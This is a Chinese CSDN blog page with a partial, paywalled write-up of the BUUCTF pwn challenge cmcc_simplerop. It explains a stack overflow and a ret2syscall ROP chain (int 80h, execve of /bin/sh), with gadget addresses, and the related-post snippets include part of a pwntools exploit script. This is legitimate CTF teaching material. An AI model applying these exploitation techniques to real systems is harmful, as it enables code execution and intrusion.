BUUCTF:cmcc_simplerop(write up)

最新推荐文章于 2023-05-08 21:03:06 发布
最新推荐文章于 2023-05-08 21:03:06 发布
阅读量768 收藏 5
点赞数 1
分类专栏: CTF-PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44768749/article/details/108249340
版权

BUUCTF:cmcc_simplerop

0x01 文件分析

在这里插入图片描述

32位程序,开启NX、部分RELRO保护

0x02 运行

在这里插入图片描述

输入一串字符串

0x03 IDA

  • main函数
    在这里插入图片描述

存在栈溢出漏洞

0x04 思路

0x04-1 解法一

  • 该题没有system函数也没有"/bin/sh",也无法泄露函数真实地址
  • 可利用int 80h系统调用

设置系统调用参数即可执行execve("\bin\sh",0,0),获取shell
四个参数分别是eaxebxecxedx

  • 利用ROPgadget --binary simplerop --only "int"找到int 80h地址为0x080493e1
    在这里插入图片描述
  • 利用ROPgadget --binary simplerop --only "pop|ret" | grep "eax"找到pop eax; ret地址为0x080bae06
    在这里插入图片描述

可对eax进行赋值

  • 利用ROPgadget --binary simplerop --only "pop|ret" | grep "ebx"找到pop edx; pop ecx; pop ebx; ret地址为0x0806e850
    在这里插入图片描述

可对edxecxebx进行赋值

  • 由于没有"/bin/sh",需要利用read函数将"/bin/sh"写入bss

没有开启地址随机化,因此可直接利用bss段地址0x080eb584

在这里插入图片描述

read函数地址0x0806cd50

在这里插入图片描述

0x04-2 解法二

  • 使用mpr
最低0.47元/天 解锁文章
  筱
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CMCC--simplerop 题解
lifanxin的博客
03-28 1527
Write Up文件信息漏洞定位利用分析wp总结 文件信息   该样本是我在做BUUCTF上的题刷到的,该题目本身漏洞明显,利用起来也不算太难,不过在我查阅一下他人的wp后发现了多种解法,在这里做个记录和总结。   老规矩先来检查一下文件的信息,32位小端程序,且只开启了NX保护。 漏洞定位 程序本身采用的是静态链接,所以用IDA进行分析的时候会发现.text段中的函数特别多,当然这本身也是为了配合题目给出的提示方便我们利用这么多的gadgets构造ROP链。 然后我们在IDA中定位到main函数,可以
【pwn】cmcc_simplerop --rop链的构造
最新发布
question55的博客
01-12 548
程序保护情况检查32位程序,堆栈不可执行主函数:左边又是一堆函数,file看一下发现是静态链接,那ret2libc不用考虑了,接着看一下有没有int 80那可以考虑利用rop链调用execve函数,用系统调用的函数参数是存在寄存器中的,但是本程序找不到/bin/sh的字符串,可以利用read函数读入/bin/sh字符串然后就是找gadgetexp:from pwn import *context(os='linux',arch='i386',log_level='debug')io=remote("node
cmcc_simplerop
个人笔记
05-08 107
int80(11,“/bin/sh”,null,null),后面的四个参数分别是eax、ebx、ecx、edx。由于未开启PIE,我们利用simplerop中的read()函数写入bss段。2、ROPgadget找寄存器。偏移:0x14+4(错误)
BUUCTF----cmcc_simplerop
qq_33010875的博客
09-28 359
环境:WSL2,ubuntu16.04,python2 常规checksec文件: ida反编译: 明显看到read函数会导致栈溢出 gdb调试程序: 用cyclic指令生成100个数字,运行程序: 求输入点到返回地址的偏移: 得到偏移是32,即0x20 值得一提的是,在ida中,我们可以看到偏移是0x18+0x04=0x1c,以gdb调试为准 原因可参考: https://blog.csdn.net/mcmuyanga/article/details/109260008 文件名给了提示,使用
[BUUCTF-pwn]——cmcc_simplerop (ropchain)
Y_peak的博客
03-16 446
[BUUCTF-pwn]——cmcc_simplerop 有栈溢出,自己找rop链,最简单的方法,让ROPgadget帮我们弄好呀,可是有点长,所有需要我们修改。毕竟有长度要求。因为“/bin/sh"字符串没有找到,所有这之前的都不动, 下面的pop eax; pop ebx; pop ecx; pop edx除了pop ebx 注意下,其他都可以进行修改 inc就是 ++ exploit 目的:使得excve("/bin/sh") eax = 0xb; ebx ->"/bin/sh"; ecx
Amigo_CMCC_Anjian.rar_Amigo_CMCC_Anji_UltraEdit_飞信
09-21
飞信 无UltraEdit-32 UltraEdit-32
CMCC.zip_cmcc_cmcc-5Pch_cmcc-edu_site:en.pudn.com
09-23
CMCC拨号器,防止浏览器误操作导致断网
SCH-MSM8909_MAIN BOARD_CMCC_PVT_A
03-23
MSM8909的原理图,以及相关资料,SCH-MSM8909_MAIN BOARD_CMCC_PVT_A
CMCC_cn_iPhone-15.5
05-20
移动运营商文件 CMCC_cn_iPhone-15.5
cmcc--simplerop
03-28
cmcc pwn题样本,可以使用多种rop方式进行漏洞利用,打开自己的思路,wp链接: https://blog.csdn.net/A951860555/article/details/115286266
BUUCTF cmcc_simplerop
BengDouLove的博客
04-14 889
这道题打开ida又是那么一大堆一大堆的函数,也没有外部引用的段,所以就是静态链接把好多函数都链接进来了 所以就和 BUU上另一道 inndy_rop 一样,直接用ROPgadget 去找rop链 from struct import pack # Padding goes here p = '' p += pack('<I', 0x0806e82a) # pop edx ...
cmcc Simplerop
Morphy_Amo的博客
03-17 3926
rop
[BUUCTF]PWN——CmmC_Simplerop
mcmuyanga的博客
11-07 242
cmcc_simplerop 附件 步骤 例行检查,32位,开启了nx保护 本地试运行一下程序,查看一下大概的情况 32位ida载入,习惯性的检索程序里的字符串,看了个寂寞,从main函数开始看程序 参数v4明显的溢出漏洞 对于这种开启了nx保护没有可以利用函数的题,我一般都是利用ret2libc的方法,但是这道题,我查plt表里,居然没有之前调用过的函数的地址, 在参考了其他师傅的wp之后知道了这题是利用的ret2syscall,binsh可以直接写入bss段,这位师傅还在程序里发现了mprote
cmcc simplerop
pondzhang的专栏
05-25 216
from pwn import * p = process('./simplerop') p.recv() int80_addr = 0x080493e1 pop_eax = 0x080bae06 read = 0x0806CD50 binsh = 0x080EB584 pop_edx_ecx_ebx = 0x0806e850 payload = 'a'*0x20 + p32(read) + p32(pop_edx_ecx_ebx) + p32(0) + p32(binsh) + p32(0x8) payl
cmcc_simplerop的wp
wuyvle的博客
03-06 332
函数很多很唬人 但确实不难,很明显要溢出 用ROP看看有没有int80 有,我们可以利用系统调用 再用ROp找找看 就这俩了 int80(11,"/bin/sh",null,null) 后面的四个参数分别是eax、ebx、ecx、edx。 所以上面的两条命令刚刚好。 没有/bin/sh就用read在bss段上写一个 1 from pwn import * 2 3 p = process('./simplerop') 4 context.log_level = 'debug' 5 6 p
1363157985066 13726230503 00-FD-07-A4-72-B8:CMCC 120.196.100.82 i02.c.aliimg.com 24 27 2481 24681 200 1363157995052 13826544101 5C-0E-8B-C7-F1-E0:CMCC 120.197.40.4 4 0 264 0 200 1363157991076 13926435656 20-10-7A-28-CC-0A:CMCC 120.196.100.99 2 4 132 1512 200 1363154400022 13926251106 5C-0E-8B-8B-B1-50:CMCC 120.197.40.4 4 0 240 0 200 1363157993044 18211575961 94-71-AC-CD-E6-18:CMCC-EASY 120.196.100.99 iface.qiyi.com 视频网站 15 12 1527 2106 200 1363157995074 84138413 5C-0E-8B-8C-E8-20:7DaysInn 120.197.40.4 122.72.52.12 20 16 4116 1432 200 1363157993055 13560439658 C4-17-FE-BA-DE-D9:CMCC 120.196.100.99 18 15 1116 954 200 1363157995033 15920133257 5C-0E-8B-C7-BA-20:CMCC 120.197.40.4 sug.so.360.cn 信息安全 20 20 3156 2936 200 1363157983019 13719199419 68-A1-B7-03-07-B1:CMCC-EASY 120.196.100.82 4 0 240 0 200 1363157984041 13660577991 5C-0E-8B-92-5C-20:CMCC-EASY 120.197.40.4 s19.cnzz.com 站点统计 24 9 6960 690 200 1363157973098 15013685858 5C-0E-8B-C7-F7-90:CMCC 120.197.40.4 rank.ie.sogou.com 搜索引擎 28 27 3659 3538 200 1363157986029 15989002119 E8-99-C4-4E-93-E0:CMCC-EASY 120.196.100.99 www.umeng.com 站点统计 3 3 1938 180 200 1363157992093 13560439658 C4-17-FE-BA-DE-D9:CMCC 120.196.100.99 15 9 918 4938 200 1363157986041 13480253104 5C-0E-8B-C7-FC-80:CMCC-EASY 120.197.40.4 3 3 180 180 200 1363157984040 13602846565 5C-0E-8B-8B-B6-00:CMCC 120.197.40.4 2052.flash2-http.qq.com 综合门户 15 12 1938 2910 200 1363157995093 13922314466 00-FD-07-A2-EC-BA:CMCC 120.196.100.82 img.qfc.cn 12 12 3008 3720 200 1363157982040 13502468823 5C-0A-5B-6A-0B-D4:CMCC-EASY 120.196.100.99 y0.ifengimg.com 综合门户 57 102 7335 110349 200 1363157986072 18320173382 84-25-DB-4F-10-1A:CMCC-EASY 120.196.100.99
06-09
这似乎是一段包含电话消费记录的数据集。每个记录都包含了一些关于电话使用情况的信息,例如电话号码、上行流量、网站或应用程序等。 要在 Eclipse 中统计手机号消费的总上行流量,您可以编写 Java 代码来解析数据集并提取上行流量数据。您可以使用字符串操作或正则表达式来提取每个记录中的手机号和上行流量数据,然后将它们与相应的电话号码关联起来以进行求和。 例如,您可以使用类似以下代码的方法来提取每个记录中的手机号和上行流量数据: ``` String[] record = line.split("\\s+"); // 将记录拆分为字符串数组 String phoneNumber = record[1]; // 提取电话号码 int uplinkTraffic = Integer.parseInt(record[8]); // 提取上行流量数据 ``` 一旦您提取了所有记录中的上行流量数据,您可以将它们相加以获得总上行流量。最后,您可以将总上行流量与每个电话号码关联起来以进行分析和报告。 请注意,数据集可能需要进行一些数据清洗和预处理,例如去除重复记录或处理缺失值等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值